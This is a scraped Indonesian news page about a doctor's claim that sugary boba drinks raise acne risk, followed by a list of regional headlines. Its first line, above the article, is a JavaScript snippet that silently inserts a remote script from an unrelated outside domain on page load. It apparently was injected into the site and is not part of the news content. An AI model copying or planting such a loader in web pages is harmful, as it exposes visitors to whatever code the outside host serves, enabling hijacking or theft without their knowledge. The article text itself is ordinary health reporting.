(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Kesehatan

Manisnya Berujung Pedih, Ini Penyebab Minuman Boba Bikin Jerawatan


KANALKALIMANTAN.COM – Banyak orang galau karena sering jerawatan. Di sisi lain, mereka juga suka mengonsumsi minuman boba yang memang jadi favorit sejuta umat. Rupanya, konsumsi minuman manis seperti itu bisa menjadi salah satu penyebab jerawat.

Belum lama ini, dr.Richard Lee menjawab pertanyaan yang selama ini bikin penasaran banyak orang. Benarkah minuman boba bisa menyebabkan jerawat?

“Selain buat gendut, boba juga bisa nyebabin jerawat. Gila loh 20 sendok teh gula, padahal batas kebutuhan 6 sendok teh,” ungkapnya lewat unggahan akun Instagram @dr.richard_lee.

Sang dokter mengunggah video Tiktok yang menerangkan mengapa minuman boba bisa menyebabkan jerawat. Dia lalu menerangkan bahwa sudah ada penelitian ilmiah tentang tingginya korelasi antara minuman manis dan jerawat.

 

Dokter Richard Lee menerangkan mengapa minuman boba bikin jerawatan. Foto: instagram/@dr.richard lee

Dia menjelaskan, “minuman yang sangat manis atau yang kita sebut high glygemic index bisa menyebabkan insulin-like growth hormonnya itu naik. Sehingga, apa yang terjadi selanjutnya?”

“Hormon androgen naik dan kelenjar sebumnya itu jadi lebih aktif, wajah jadi lebih berminyak sehingga peluang pori-pori tersumbat itu besar banget dan akhirnya terjadi jerawat.”

“Jadi bagi kalian yang suka kena jerawatan hormonal, yang sedikit-sedikit jerawatan, yang kalau menstruasi jerawatan, kalau kecapekan jerawatan, hindari minum yang manis, apalagi boba kayak gini,” kata dia.

“Karena satu minuman boba seperti ini sama dengan 20 sendok teh (gula), sedangkan yang direkomendasikan WHO, laki-laki itu cuma 9 sendok teh, wanita 6 sendok teh,” imbuhnya kemudian.

Sementara itu hingga Senin (21/12/2020), video terkait sudah ditonton sebanyak lebih dari 180 ribu kali di Instagram dan mendapatkan beragam komentar dari warganet.

“Makasih Dok ilmunya. Aku jadi tahu. Aku jerawat hormonal. Tapi sebulan sekali nggak apa-apa ya Dok. Hehehe….,” komentar seorang warganet.

“Ya memang minum kebanyakan boba ya nggak bagus. Apapun yang berlebihan tidak bagus. Poinnya itu, bukan hanya boba,” komentar warganet lain. (suara.com)

Reporter: suara.com
Editor: KK


Al Ghifari

Recent Posts

Peringati Hari Buruh, PLN Tebar Kebaikan untuk Petugas Kebersihan Kebun Raya Banua

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan… Read More

1 jam ago

Jhonny Iskandar Meninggal Dunia, Ini Profil Pelantun “Bukan Pengemis Cinta”

KANALKALIMANTAN.COM - Penyanyi senior Jhonny Iskandar meninggal dunia hari ini, Jumat (10/5/2024). Eks personel Orkes… Read More

3 jam ago

TMMD di Desa Sungai Karias Bangun Ulang Rumah Tak Layak Huni

KANALKALIMANTAN.COM, AMUNTAI – Membangun ulang Rumah Tidak Layak Huni (RTLH) menjadi layak huni menjadi salah… Read More

3 jam ago

Lepas Atlet ke Popda Kalsel, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Target juara umum kontingen Kota Banjarbaru dalam ajang Pekan Olahraga Pelajar Daerah… Read More

4 jam ago

Wagub Edy Pratowo Maju Pilkada Kalteng, Siap Dipasang Posisi Apapun

KANALKALIMANTAN.COM, PALANGKARAYA - Wakil Gubernur (Wagub) Kalimantan Tengah (Kalteng), Edy Pratowo, mengumumkan keputusannya untuk mendaftarkan… Read More

4 jam ago

Target Juara Umum Popda Kalsel 2024, Aditya Janji Beri Bonus Pribadi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin melepas 109 atlet untuk berlaga dalam… Read More

5 jam ago

This website uses cookies.